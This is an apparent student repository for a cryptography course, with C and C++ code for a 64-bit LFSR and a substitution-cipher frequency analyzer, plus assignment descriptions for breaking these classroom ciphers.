"goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "/*\nCode for 64 bit LFSR\nHunter Johnson\n9/15/17\n\nmodified by: James Roesemann\n10/12/17\nthis program is a modification of lfsr.c for the purpose of developing the missing functions of that program.\n*/\n\n/*\nto do:\nread_lfsr \t\t\tdone\nnext_state\nget_128_keystream\nshape_keystream\n*/\n\n\n#include <stdint.h>\n#include <stdlib.h>\n#include <stdio.h>\n#include <assert.h>\n\n/*The following struct will represent an LFSR with a 64 bit state.\n The taps are represented by a 64 bit number, where the ith bit (from the right)\n corresponds to p_i (in the notation of the textbook).\n The uint64_t is a 64 bit unsigned integer.\n There is a small chance that this code may behave unexpectedly if compiled on Windows or Mac.\n Please let me know if you get issues.\n It compiles and runs under clang and gcc. */\ntypedef struct {\n\tuint64_t state;\n\tuint64_t taps;\n} LFSR;\n\nvoid init_LFSR(LFSR* L, uint64_t initial_state, uint64_t taps)\n{\n/*Initialize with state and taps*/\n\tL->state = initial_state;\n\tL->taps = taps;\n}\nint parity(uint64_t N)\n{\n/* Return the parity of N*/\n\tint p = __builtin_parity(N); // parity of first 32 bits\n\tN = __builtin_bswap64(N); //move back 32 to the front\n\treturn (p+__builtin_parity(N))%2; //overall parity\n}\n\n\n\n//everyhting below is something i had to modify. everything above came with the program\n\n\n\nint read_lfsr(LFSR* L)\n{\n/*Return the current output bit (the rightmost bit of the state variable) */\n//get the rghtmost bit by returning L mod 2\n\treturn L->state%2;\n}\n\nvoid next_state(LFSR* L)\n{\n/*Takes LFSR.\n Returns nothing.\n Side effect: advances L to next state.(shift to the right and replace leftmost bit with appropriate value)\n*/\n\n /* You implement this.\n Hint: make use of the parity() function provided above*/\n int mib=parity(L->state & L->taps);\n if(mib==1) L->state = (L->state >>1) | 0x8000000000000000;\n else L->state = (L->state >> 1);\n\n}\n\n\n\n//showbits function taken from wikipedia for testing\nvoid showbits(unsigned int x)\n{\n int i; \n for(i=(sizeof(int)*8)-1; i>=0; i--)\n (x&(1u<<i))?putchar('1'):putchar('0');\n \n printf(\"\\n\");\n}\n//also copied for testing\n void bin(uint64_t n)\n{\n\n if (n > 1)\n bin(n/2);\n \n\n printf(\"%lu\", n % 2);\n}\n//0x80000000 in unsighned int is the equivilent of an int value with only one 1 on the leftmost bit and all zeros after. using this value to add 1 on the leftmost bit when needed.\n//above is 32 bit. need to replace it iwth the 64 bit equivlent. \tj = (j >>1) | 0x80000000;\n//0x8000000000000000 64bit hex equivelent\n\n//i think this works, the problem is i'm really confused about wht athe taps are for. read/look up a video on lfsr before using this.\n\nint main()\n{\n\tLFSR L;\n\tuint64_t initial_state = 0xbeefcafebabecab1;\n\tuint64_t taps = 0xdeaddeedacedface;\n\tinit_LFSR(&L,initial_state,taps);\n\t//everyhing after this i need to fill in myself\n\n\t//test\n\tuint64_t i;\n\t//printf(\"%d\\n\", i);\n\ti=parity(L.taps & L.state);\n\tshowbits(3);\n\tbin(3);\n\tprintf(\"\\n\");\n\n\n\n\n\n\n\n\n\n}\n" }, { "alpha_fraction": 0.7046263217926025, "alphanum_fraction": 0.7168841361999512, "avg_line_length": 28.4069766998291, "blob_id": "5c47b8ca48a947066a79898fb2e54616bf29bb0e", "content_id": "c39db3ad243d5cbb4dbb031775e2fc5b98da2ad9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2529, "license_type": "no_license", "max_line_length": 569, "num_lines": 86, "path": "/Project_1/decode3.cpp", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "//james Roesemann\n//CSCi360-01\n//Project 1\n#include <iostream>\n#include <queue>\n#include \"charBox.h\"\nusing namespace std;\n\n//fills the queue x with 26 elements\nvoid buildCharBox(queue<charBox>* x)\n{\n\tfor(int i=0; i<27; i++){x->push(charBox());}\n}\n\n//if x == 90, set the name value of the element to x. thrn returns the element. if not, pops the first element to y, setes its name to x. calls alphaChar buils with x+1. pushes y into alphaCharBuilds return. the nreturns boxVar.\nqueue<charBox>* alphaCharBuild( queue<charBox>* boxVar, int x)\n{\n\tif(boxVar->empty()) {return boxVar;}\n\tcharBox y=boxVar->front();\n\tboxVar->pop();\n\ty.setName(x);\n\tboxVar=alphaCharBuild(boxVar, x+1);\n\tboxVar->push(y);\n\treturn boxVar;\n}\n//set the first elements of the queue's name value to. ' '. Calls buildAlphaChar to fill in A-Z returns the queue\nqueue<charBox>* alphaCharBuild( queue<charBox>* boxVar)\n{\n\tcharBox y=boxVar->front();\n\tboxVar->pop();\n\ty.setName(' ');\n\tboxVar=alphaCharBuild(boxVar, 65);\n\tboxVar->push(y);\n\treturn boxVar;\n}\n//recursivly counts the number of occurances of the entered character. doulbes as a way to enter new characters into the cryptoChars queue. if the elemets name variable == '\\0' then it assignes the character to name , increments count by 1 and returns. if the entered character == name then it increments that character element by 1. if not pops the boxVar and calls chracterCount untill it finds the character or boxVar is empty. when entering text from moby dick the entered character must already set to Upper case. actually all characters alreay will be capatlized.\n \nqueue<charBox>* charCount( queue<charBox>* boxVar, char charVal)\n\n{\n\tif(boxVar->empty()) { return boxVar;}//it should only get here when we are counting characters from moby dick. cryptoText should have exactly 26 types of characters.\n\tif(boxVar->front().getName()=='\\0')\n\t{\n\t\tboxVar->front().setName(charVal);\n\t\tboxVar->front().add();\n\t\treturn boxVar;\n\t}\n\tif(boxVar->front().getName()==charVal)\n\t{\n\t\tboxVar->front().add();\n\t\treturn boxVar;\n\t}\n\tcharBox temp=boxVar->front();\n\tboxVar->pop();\n\tboxVar=charCount(boxVar, charVal);\n\tboxVar->push(temp);\n\treturn boxVar;\n}\n//\n\n\nint main()\n{\n\tqueue<charBox> alphaChars;\n\tqueue<charBox> cryptoChars;\n\n\tbuildCharBox(&alphaChars);\n\tbuildCharBox(&cryptoChars);\n\n\talphaCharBuild(&alphaChars);\n\n\t//TEST\n\twhile(!alphaChars.empty())\n\t{\n\t\tcout << alphaChars.front().getName() << endl;\n\t\talphaChars.pop();\n\t}\n\t\n\n\n\treturn 0;\n}\n\n\n\n\t//if(charValcharVal<=122 && charVal>=97){charVal=charVal-32;} //in case its lowercase,\n" }, { "alpha_fraction": 0.7108433842658997, "alphanum_fraction": 0.7108433842658997, "avg_line_length": 12.833333015441895, "blob_id": "147bbf9a83ba5eddb91be2574dda2b1190f9f2de", "content_id": "41e1311771b53e09349ab9198bb73b6510a5f629", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 83, "license_type": "no_license", "max_line_length": 29, "num_lines": 6, "path": "/Project_3/project_3/notes.txt", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "notes.\n\n-K when specifiying pw in hex\n-k when just pasword.\n\n-iv only used with -K\n" }, { "alpha_fraction": 0.7097500562667847, "alphanum_fraction": 0.7122269868850708, "avg_line_length": 30.94964027404785, "blob_id": "0c04c2d3312b3c4e4b029564357bdf89cb038bca", "content_id": "2ed63686c9c232cd3bcdb8b5c48702c86911981e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4441, "license_type": "no_license", "max_line_length": 166, "num_lines": 139, "path": "/Project_1/Final_Files/statAnalyzer.h", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "#ifndef STATANALYZER_H\n#define STATANALYZER_H\n#include \"charBox.h\"\n#include <iostream>\n#include <list>\n#include <fstream>\n\n//fills the std::list x with 27 elements \nvoid buildCharBox(std::list<charBox>* x)\n{\n\tfor(int i=0; i<27; i++){x->push_front(charBox());}\n}\n\n//recursivly counts the number of occurances of the entered character. \n//doubles as a way to enter new characters into the std::list. \n//if the elemets name variable == '\\0' then it assignes the character to name , increments count by 1 and returns boxVar. \n//if the entered character == name then it increments that character element by 1 and returns boxVar.\n// if not it pop_fronts the boxVar and calls charCount untill it finds the character or boxVar is empty. \n \nstd::list<charBox>* charCount( std::list<charBox>* boxVar, char charVal)\n{\n\t//if boxVar is empty, return\n\tif(boxVar->empty()) { return boxVar;}\n\t//if the name of the front of boxVar is empty, addign it a name, increment it, and return box var.\n\tif(boxVar->front().getName()=='\\0')\n\t{\n\t\tboxVar->front().setName(charVal);\n\t\tboxVar->front().add();\n\t\treturn boxVar;\n\t}\n\t//if the front name of boxVar == charVal, increment it and return. \n\tif(boxVar->front().getName()==charVal)\n\t{\n\t\tboxVar->front().add();\n\t\treturn boxVar;\n\t}\n\t//if not, pop_front the front value of boxVar, store it, and pass it and char val to charCount. push_front it back into box var once it returns. then return box var.\n\tcharBox temp=boxVar->front();\n\tboxVar->pop_front();\n\tboxVar=charCount(boxVar, charVal);\n\tboxVar->push_front(temp);\n\treturn boxVar;\n}\n//returns an int with the total number of characters \nint getTotal(std::list<charBox> boxVar)\n{\n\tint total=0;\n\twhile(!boxVar.empty())\n\t{\n\t\ttotal+=boxVar.front().getCount();\n\t\tboxVar.pop_front();\n\t}\n\treturn total;\n}\n//computes the frequency of all the elements in the std::list.\nstd::list<charBox>* setFreq( std::list<charBox>* boxVar, int total)\n{\n\tif(boxVar->empty()){return boxVar;}\n\tboxVar->front().setFreq(total);\n\tcharBox temp=boxVar->front();\n\tboxVar->pop_front();\n\tboxVar=setFreq(boxVar, total);\n\tboxVar->push_front(temp);\n\treturn boxVar;\n}\n\n//searches the std::list for the highest frequency element, outputs it to the given fstream. returnes the element to be deleted from the std::list.\ncharBox getHighest( std::list<charBox> boxVar, float highest, charBox element)\n{\n\t//if boxVar is empty, return element.\n\tif(boxVar.empty())\n\t{\n\t\treturn element;\n\t}\n\t//if the top of boxVar has a higher freq then highest, assign it to element and it's frequency to highest.\n\tif(boxVar.front().getFreq() > highest)\n\t{\n\t\thighest=boxVar.front().getFreq();\n\t\telement=boxVar.front();\n\t}\n\tboxVar.pop_front();\n\treturn getHighest(boxVar, highest, element);\n}\n//searches through the std::list and remove the matching element.\nstd::list<charBox>* removeCharBox(std::list<charBox>* boxVar, char name)\n{\t\n\tif(boxVar->empty()){return boxVar;}\n\tif(boxVar->front().getName() == name)\n\t{\n\t\tboxVar->pop_front();\n\t\treturn boxVar;\n\t}\n\tcharBox temp =boxVar->front();\n\tboxVar->pop_front();\n\tboxVar=removeCharBox(boxVar, name);\n\tboxVar->push_front(temp);\n\treturn boxVar;\n\t\n}\n//modified version of charCount that just reads in cryptNamevalues for charBox.\nstd::list<charBox>* cryptInsert( std::list<charBox>* boxVar, char charVal)\n{\n\t//if boxVar is empty, return\n\tif(boxVar->empty()) { return boxVar;}\n\t//if the name of the front of boxVar is empty, addign it a name, increment it, and return box var.\n\tif(boxVar->front().getCryptName()=='\\0')\n\t{\n\t\tboxVar->front().setCryptName(charVal);\n\t\treturn boxVar;\n\t}\n\tif(boxVar->front().getCryptName()==charVal){return boxVar;}\n\t//if not, pop_front the front value of boxVar, store it, and pass it and char val to charCount. push_front it back into box var once it returns. then return box var.\n\tcharBox temp=boxVar->front();\n\tboxVar->pop_front();\n\tboxVar=cryptInsert(boxVar, charVal);\n\tboxVar->push_front(temp);\n\treturn boxVar;\n}\n//searches boxVar for a cryptName that matches charVal. outputs the character name to the fstream.\nstd::list<charBox>* decrypt( std::list<charBox>* boxVar, std::fstream &outfile, char charVal)\n{\n\t//if boxVar is empty\n\tif(boxVar->empty()){return boxVar;}\n\t//if the character is found\n\tif(boxVar->front().getCryptName()==charVal)\n\t{\n\t\toutfile << boxVar->front().getName();\n\t\treturn boxVar;\n\t}\n\tcharBox temp=boxVar->front();\n\tboxVar->pop_front();\n\tboxVar=decrypt(boxVar, outfile, charVal);\n\tboxVar->push_front(temp);\n\treturn boxVar;\n}\n\n\n\n#endif\n" }, { "alpha_fraction": 0.5980392098426819, "alphanum_fraction": 0.6004902124404907, "avg_line_length": 17.71559715270996, "blob_id": "9722a262c4216ba48bffb3f8fbca2790df0188d7", "content_id": "21efee688d2edaf103738f1e1656e66cfbdd35b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2040, "license_type": "no_license", "max_line_length": 174, "num_lines": 109, "path": "/Project_1/Final_Files/sol_corrections.cpp", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "/*\nJames Roesemann\nCSCI360\nproject 1\nsol_corrections.cpp\n\n\nthis program reads in the characters from cracked.txt and outputs a file called clear.txt\ncharacter substitiutions are made where apropriate tobased on manual observations. \n\nclear.txt contains the orignal unencrypted plain text used to make ciphertext.txt.\n*/\n\n#include <iostream>\n#include <list>\n#include <fstream>\nusing namespace std;\n\nint main()\n{\n\tfstream infile, outfile;\n\tchar temp;\n\tinfile.open(\"cracked.txt\");\n\toutfile.open(\"clear.txt\", std::fstream::out | std::fstream::trunc);\n\ttemp=infile.get();\n\twhile(!infile.eof())\n\t{\n\n\t\t//these were chosen in no particular order.\n\t\tswitch(temp)\n\t\t{\n\t\t\tcase 'O':outfile <<'H';\n\t\t\t\tbreak;\n\t\t\tcase 'C':outfile <<'U';\n\t\t\t\tbreak;\n\t\t\tcase 'H':outfile <<'N';\n\t\t\t\tbreak;\n\t\t\tcase 'R':outfile <<'D';\n\t\t\t\tbreak; \n\t\t\tcase 'L':outfile <<'R';\n\t\t\t\tbreak; \n\t\t\tcase 'N':outfile <<'O';\n\t\t\t\tbreak; \n\t\t\tcase 'W':outfile <<'G';\n\t\t\t\tbreak; \n\t\t\tcase 'F':outfile <<'M';\n\t\t\t\tbreak; \n\t\t\tcase 'M': outfile <<'F';\n\t\t\t\tbreak; \n\t\t\tcase 'Y':outfile <<'P';\n\t\t\t\tbreak;\n\t\t\tcase 'P':outfile <<'B';\n\t\t\t\tbreak;\n\t\t\tcase 'K':outfile <<'V';\n\t\t\t\tbreak;\n\t\t\tcase 'U':outfile <<'C';\n\t\t\t\tbreak;\n\t\t\tcase 'G':outfile <<'W';\n\t\t\t\tbreak;\n\t\t\tcase 'D':outfile <<'L';\n\t\t\t\tbreak;\n\t\t\tcase 'B':outfile <<'Y';\n\t\t\t\tbreak;\n\t\t\tcase 'V':outfile <<'K';\n\t\t\t\tbreak;\n\t\t\tcase 'J':outfile <<'Z';\n\t\t\t\tbreak;\n\t\t\tcase 'Q':outfile <<'X';\n\t\t\t\tbreak;\n\t\t\tcase 'X':outfile <<'J';\n\t\t\t\tbreak;\n\t\t\tcase 'Z':outfile <<'Q';\n\t\t\t\tbreak;\n\t\t\tdefault: outfile << temp;\n\t\t\t\tbreak;\n\t\t\t\n\t\t}\n\t\ttemp=infile.get();\n\t}\n\tinfile.close();\n\toutfile.close();\n\treturn 0;\n\n}\n\n/*running list of characters that have been switched. there should be a case and a switch of each character listed here. characters with an x on the right have found a match \n\tO->H x definatly\n\tc->U x (definatly)\n\tH->N x (definatly)\n\tR->D x definatly\n\tL->R x\n\tN->O x\n\tW->G x\n\tF->M x (definitly)\n\tM->F x\n\tY->P x definatly\n\tP->B x definatly\n\tK->V x definatly\n\tU->C x\n\tG->W x definatly\n\tD->L x\n\tB->Y x\n\tV->K x definatly\n\tj->Z x Definatly\n\tQ->x x\n\tx->J x\n\tz->Q x\n\t\n*/\n" }, { "alpha_fraction": 0.7080299854278564, "alphanum_fraction": 0.7347604036331177, "avg_line_length": 41.19724655151367, "blob_id": "37b441cdea907be0cb41aead1e68ea241b462268", "content_id": "291a7c4b51b39775eee405a2293bf0991b773831", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 9203, "license_type": "no_license", "max_line_length": 437, "num_lines": 218, "path": "/Project_2/project_2/description.md", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "# Cracking a LFSR stream cipher\n## Project 2\n### Due Th 10/5\n\n---\n\n#### Summary\nIn this project we will execute a known plaintext attack on a LFSR stream cipher.\n\nIn particular, we will crack an LFSR with degree $m=64$. Given will be a long ciphertext which is known to be the encryption of a book from Project Gutenberg. The first few bytes of works on Project Gutenberg are all very similar, which allows for a known plaintext attack. The target ciphertext is in this directory and has the name `target_ciphertext`.\n\nUsing known plaintext, we will recover $2m=128$ bits of keystream, and solve a system of linear equations to determine the tap bits $p_0,p_1,\\ldots,p_{63}$. If the basic idea of this plan is not clear to you, please read the section of the textbook on this topic (Chapter 2).\n\nIn order to do the attack you will first need to implement some parts of an LFSR. Then you will use Sage together with some known plaintext to produce the original state and tap variables used in the encryption of the target. Finally you will use your LFSR to decrypt the target and produce the solution.\n\n---\n\n#### `lfsr.c`\n\nI have prepared an outline of the code you need to write in the file called `lfsr.c` which you should find in this directory.\n\nThis program implements a 64 bit LFSR based on the C type `uint64_t`. You can think of variables of this type as 64 bit unsigned integers. We use one of these types to represent the state of the LFSR (i.e. $s_{m-1},s_{m-2},\\ldots,s_1,s_0$) and one to represent the tap bits (i.e. $p_{m-1},p_{m-2},\\ldots,p_1,p_0$).\n\nYou can compile and run this code from a terminal on cocalc with these commands:\n\n```\n~/project_2$ gcc lfsr.c\n~/project_2$ ./a.out\n```\n\nOptionally you could use the `clang` compiler rather than `gcc`; generally `clang` has more helpful error messages than `gcc`.\n\nThe output is a file called `ct.dat`. Right now it is identical to the plaintext input, namely `toy_pt.txt`. After you implement the missing functions in `lfsr.c`, the output should be identical to the data in the file `ct.toy`. You can check whether they agree from a cocalc terminal with this command:\n\n```\n~/project_2$ diff ct.dat ct.toy\n```\n\nIf there is no output, then you have successfully implemented your LFSR. If there is output saying that the files differ, then your LFSR does not yet work correctly. By confirming that `ct.dat` and `ct.toy` agree, you can be confident that your LFSR works before moving on to other parts of the project.\n\nWe will say more below about the missing functions which you need to implement, after we introduce the basic datatypes used to implement our 64 bit LFSR.\n\n---\n\nThe code in `lfsr.c` represents a 64 bit LFSR in the following way. The 64 bits of both the state bits and the taps are represented using the `uint64_t`, which is a 64 bit integer type. The least significant bits of a `uint64_t` correspond to the small indexes for $s_i$ and $p_i$. For example, the binary number (expressed in hex)\n\n```\nuint64_t state = 0x0000000000000005\n```\n\nwould indicate that $s_0=1$, $s_1 = 0$, $s_2 = 1$, and $s_i = 0$ when $i \\notin \\{0,1,2\\}$.\n\nSimilarly the binary number (expressed in hex)\n\n```\nuint64_t taps = 0x60000000000000001\n```\n\nindicates that $p_0=1$, $p_{62}=p_{61}=1$ and $p_i = 0$ when $i \\notin \\{0,61,62\\}$.\n\n\n\nMost of the code you need to implement an LFSR has already been written. There are a few crucial functions left for you to write, which will be described in detail below.\n\n\n\nThe LFSR L is a struct type defined in the file as follows:\n\n```\ntypedef struct {\n\tuint64_t state;\n\tuint64_t taps;\n} LFSR;\n```\n\nThus L has two fields, which are both 64 bit integers. These represent the variables $s_{m-1},s_{m-2},\\ldots,s_1,s_0$ and $p_{m-1},p_{m-2},\\ldots,p_1,p_0$ as described above.\n\nCurrently the `main()` function has this code:\n\n```\nint main()\n{\n\tLFSR L;\n\tuint64_t initial_state = 0xbeefcafebabecab1;\n\tuint64_t taps = 0xdeaddeedacedface;\n\tinit_LFSR(&L,initial_state,taps);\n\tencrypt(\"toy_pt.txt\",\"ct.txt\",&L);\n\tinit_LFSR(&L,initial_state,taps);\n\tdecrypt(\"ct.txt\",\"toy_ot.txt\",&L);\n\t//get_128_keystream_bits(\"target_ciphertext\",\"<you fill this in>\");\n\t//shape_keystream();\n}\n```\n\nThe first four lines of this function declare and initialize the state and tap variables of the LFSR. Right now these are initialized with sample values. In the course of decrypting `target_ciphertext`, you will determine the settings used to produce the keystream that encrypted that ciphertext.\n\nThe last two lines in this file are commented out, but you should comment them back in as you fill in the functions necessary for them to run. We will describe these functions in detail below.\n\n\nThe code currently in `lfsr.c` should compile and run. There is a chance that there will be problems if the code is compiled on Visual Studio because GNU builtin commands are used in the `parity()` function in `lfsr.c`.\n\n[This](https://stackoverflow.com/questions/43883473/working-inline-assembly-in-c-for-bit-parity) version of the partity function should work on Windows:\n\n```\nint parity(uint64_t n){\n/*For use on non-GNU compilers*/\n/*Downloaded from https://stackoverflow.com/questions/43883473/working-inline-assembly-in-c-for-bit-parity*/\n n ^= n >> 1;\n n ^= n >> 2;\n n = (n & 0x1111111111111111) * 0x1111111111111111;\n return (n >> 60) & 1;\n}\n```\nYou can comment out the provided parity function and replace it with the above if you prefer not to work in GNU.\n\n---\n\n### Completing the LFSR\n\nTo complete the code in `lfsr.c` and produce a working LFSR you need to write two functions. These are the `read_lfsr` and `next_state` functions shown below.\n\n```\nint read_lfsr(LFSR* L)\n{\n/*Return the current output bit (the rightmost bit of the state variable) */\n\n\n/* You implement this*/\n\n return 0; // remove this line when you properly implement the function.\n\n}\n\nvoid next_state(LFSR* L)\n{\n/*Takes LFSR.\n Returns nothing.\n Side effect: advances L to next state.(shift to the right and replace leftmost bit with appropriate value)\n*/\n\n /* You implement this.\n Hint: make use of the parity() function provided above*/\n\n}\n```\nAs described in the comments, the `read_lfsr` function should return the rightmost bit of the LFSR `state` variable. Note that `L` is passed as a pointer, so the `state` field must be accessed as `L->state` not `L.state`.\n\nThe `next_state` function updates the state of the LFSR according to the value of the tap bits. The simplest way to do this is to AND the state and taps variables, and then return the parity of the result. This works because AND is coordinate-wise multiplication modulo 2, and parity is a summation of bits modulo 2.\n\nAs discussed above, you can check the correctness of your code by comparing `ct.dat` and `ct.toy`.\n\nWhen you have a working LFSR, you can use it to decrypt `target_ciphertext` as soon as you know the initial state and tap settings used to produce that ciphertext.\n\n---\n\n### Recovering the state and tap variables\n\nIn order to recover the state and tap settings used to encrypt `target_ciphertext`, we must first use a known-plaintext attack to recover the initial state, $s_0,s_1,\\ldots,s_{63}$.\n\nTo do this, complete the function `get_128_keystream_bits`, described below.\n\n```\nvoid get_128_keystream_bits(char* ct,char* kpt)\n{\n/*This function takes 16 bytes of ciphertext and 16 bytes of\n known plaintext.\n The output is a file named \"key_stream.txt\" that contains 128 bits\n of keystream. The stream is represented in ASCII, with 128 lines, and\n either a \"0\" or a \"1\" on each line. */\n\n/*This is the plaintext attack in which you recover 2m keystream bits.\n\n You implement this.\n*/\n\n}\n```\nAs discussed in the book, a known plaintext attack works by XORing the known plaintext with the ciphertext (in this case `target_ciphertext`). This exposes a certain amount of the keystream. Because the period of the LFSR is 64, you need $2\\cdot64/8 = 16$ bytes of keystream. For your 16 bytes of known plaintext, you might want to investigate what the first 16 characters tend to be for books posted as plaintext on Project Gutenberg.\n\nOnce you have the first 8 bytes of keystream, you know the initial state of the LFSR, and you can fill in this value back in `main()`.\n\nThat is, change\n\n```\n\tuint64_t initial_state = 0xbeefcafebabecab1;\n```\n\nto\n\n```\n\tuint64_t initial_state = 0xZZZZZZZZZZZZZZZZ;\n```\nwhere `0xZZZZZZZZZZZZZZZZ` is the initial state expressed in hex. Recall that $s_0$ goes in the rightmost bit, and $s_{63}$ goes in the leftmost bit.\n\nAll that remains to be done is to recover the inital taps.\n\n---\n\n### Recovering the taps\n\nThis task is outlined in detail in the file `matrix.sagews` in this folder. Please read this document.\n\n### Grading:\n\nIn order to grade this project I will be testing the following:\n\n1. Does \"read_lfsr\" work\n2. Does \"next_state\" work\n3. Does \"get_128_keystream_bits\" work\n4. Does \"shape_keystream\" work\n5. Did you decrypt `target_ciphertext`.\n\nThere are many opportunities for partial credit.\nPlease begin early and post questions on Piazza or ask them in class.\n\n### Submission:\n\nPlease simply leave your files in the `project_2` folder and they will be automatically collected. \n\n\n" }, { "alpha_fraction": 0.7033168077468872, "alphanum_fraction": 0.7160268425941467, "avg_line_length": 63.17318344116211, "blob_id": "d35eb8008a5ecc7234ff8bc1f21bb034fd1684ea", "content_id": "97e8da2532e3d76e3ae7e3827de622c139567df4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 11487, "license_type": "no_license", "max_line_length": 3440, "num_lines": 179, "path": "/Project_1/description.md", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "# Project 1\n## Historical cryptography\n\nThe goal of this project is to break a substitution cipher. A [substitution cipher](https://en.wikipedia.org/wiki/Substitution_cipher) is a cipher in which a plaintext is converted character by character into ciphertext by using a predetermined rule of association. For example, the Caesar cipher is a special kind of substitution cipher in which\n\n$A \\rightarrow D$, $B \\rightarrow E$, $C \\rightarrow F$, etc.\n\nThe Caesar cipher has a very simple form, because each character is simply advanced three places to form the ciphertext. However, in general, the rule can be more complicated.\n\nThe following text is given in the file called `ciphertext.txt` in the assignment folder.\n\n```\n<X%Z|*aZXcWZa%c[R>Z[%csX%WZ<X%Z+%[PWPcaZcaWZXP|Z|sL[sXPa\\Z[c>|Zi%RRZi*RRZLaZ<X%Z[Ls.|Z4XPsXZ|%%+%WZ<X%+|%Ry%|Z|%a|POR%ZLiZ<X%ZX%c<Z<XL*|caW|ZLiZ\\[c||XL77%[|ZXPWW%aZPaZ<X%ZO*|X%|ZsXP[7%WZ4P<XZcZ+LaL<LaL*|ZcaWZW*RRZaL<%Z<X%ZR%cy%|ZLiZ<X%Z+>[<R%ZcaWZLRPy%Z<[%%|Z4cy%WZcaWZ[*|<R%WZPaZ<X%Z4PaWZc<Z%y%[>Z|<%7Z<Xc<Z%W+LaWZ<LL.ZX%ZWP|<*[O%WZ<X%ZRPoc[W|Z\\RP<<%[Pa\\Z4P<XZ<X%ZX*%|ZLiZ<X%Z%+%[cRWZcic[ZLiiZX%Z|c4Z<X%Z4PRWZ\\Lc<|ZOL*aWPa\\Zi[L+Zs[c\\Z<LZs[c\\ZPaZcZ4L[WZ<X%ZP|RcaWZ4c|ZPaXcOP<%WZ>%<Z%W+LaWZi%R<ZXP+|%RiZcRLa%Z\\*PW%WZO>Z<X%ZXcaWZLiZ\\LWX%Zi%R<ZcaZPaW%|s[POcOR%Z|%a|c<PLaZ|L+%4Xc<Zc.PaZ<LZW[%cW<Xc<ZW[%cWZLiZ<X%ZWc>RP\\X<Z4XPsXZ%y%aZPaZ<X%ZW%|%[<Z+c.%|Z*|Zi%c[Z4%Zc[%Z4c<sX%WZcaWZLO|%[y%WZ<XP|Zi%%RPa\\Z4c|Z|LZ|<[La\\Z<Xc<Zc<Z<X%Z+L+%a<Z4X%aZ%W+LaWZ4c|ZcOL*<Z<LZO%\\PaZXP|ZRcOL[ZX%Z|<L77%WZRcPWZWL4aZXP|Z7Ps.c6%Z|%Po%WZXP|Z\\*aZ+L*a<%WZ<LZ<X%Z|*++P<ZLiZ<X%ZXP\\X%|<Z[Ls.ZcaWZi[L+Z<X%as%Z\\co%WZ[L*aWZPaZ%y%[>ZWP[%s<PLaO*<ZP<Z4c|ZaL<Z*7LaZsL[|PscZ<X%Zy%[>ZXL*|%|ZLiZ4XPsXZX%ZsL*RWZWP|<Pa\\*P|XZL[ZLaZ|c[WPaPcZL[ZLaZ<X%ZP|RcaWZLiZ%ROcZ4P<XZP<|ZXP|<L[PscRZc||LsPc<PLa|ZL[Z*7LaZ<X%ZcR+L|<ZP+7%[s%7<POR%ZRPa%Z<Xc<Z<LZ<X%Z%67%[P%as%WZ%>%ZLiZcZ|cPRL[ZcRLa%Z[%y%cR%WZ<X%ZsLc|<ZLiZ\\%aLcZ<X%Z7[L*WZcaWZR%\\XL[aZ<X%ZsL++%[sPcRZ<Xc<ZX%Z\\co%WZP<Z4c|Zc<Z<X%ZO[P\\ca<Pa%Z<Xc<ZXcWZR%i<ZPaZ<X%Z+L[aPa\\ZcaWZ<X%Z<c[<caZ<Xc<ZXcWZ:*|<Z|%<Z|cPRZ<Xc<Z%W+LaWZiP6%WZXP|Z%>%|<X%ZiP[|<Z4c|Z:*|<ZWP|c77%c[Pa\\ZPaZ<X%Z|<[cP<|ZLiZOLaPicsPLZ<X%ZL<X%[ZiLRRL4Pa\\ZcaZL77L|P<%ZWP[%s<PLaZ4c|ZcOL*<Z<LZ[L*aWZ<X%ZP|RcaWZLiZsL[|Psc<XP|Z|P\\X<Z[%c||*[%WZXP+ZX%Z<X%aZRLL.%WZc<Z<X%ZLO:%s<|Za%c[ZXP+ZX%Z|c4Z<Xc<ZX%Z4c|ZLaZ<X%ZXP\\X%|<Z7LPa<ZLiZ<X%ZP|RcaWcZ|<c<*%ZLaZ<XP|Zyc|<Z7%W%|<cRZLiZ\\[caP<%ZaL<XPa\\ZX*+caZc77%c[Pa\\ZPaZ|P\\X<Z4XPR%Z<X%ZOR*%ZLs%caZO%c<Zc\\cPa|<Z<X%ZOc|%ZLiZ<X%ZP|RcaWZcaWZsLy%[%WZP<Z4P<XZcZi[Pa\\%ZLiZiLc+Z<X%aZX%ZW%|s%aW%WZ4P<XZsc*<PL*|ZcaWZ|RL4Z|<%7ZiL[ZX%ZW[%cW%WZR%|<ZcaZcssPW%a<Z|P+PRc[Z<LZ<Xc<ZX%ZXcWZ|LZcW[LP<R>Zi%P\\a%WZ|XL*RWZXc77%aZPaZ[%cRP<>Wca<|Zc|Z4%ZXcy%Z|cPWZXcWZ<[cs%WZ<X%Z+c[.|ZcRLa\\Z<X%Z[Ls.|ZcaWZX%ZXcWZaL<Ps%WZ<Xc<Z<X%>ZR%WZ<LZcZ|+cRRZs[%%.Z4XPsXZ4c|ZXPWW%aZRP.%Z<X%ZOc<XZLiZ|L+%ZcasP%a<Za>+7XZ<XP|Zs[%%.Z4c|Z|*iiPsP%a<R>Z4PW%Zc<ZP<|Z+L*<XZcaWZW%%7ZPaZ<X%Zs%a<[%Z<LZcW+P<ZLiZ<X%Z%a<[cas%ZLiZcZ|+cRRZy%||%RZLiZ<X%ZR*\\\\%[ZsRc||Z4XPsXZ4L*RWZO%Z7%[i%s<R>ZsLas%cR%WZi[L+ZLO|%[yc<PLa<X%aZiLRRL4Pa\\Z<X%ZsR%4Z<Xc<ZPaZ<X%ZXcaW|ZLiZ<X%ZcOOZic[PcZXcWZO%%aZ|LZ|.PRi*RR>Z*|%WZ<LZ\\*PW%ZXP+Z<X[L*\\XZ<X%ZWWcRPcaZRcO>[Pa<XZLiZ7[LOcOP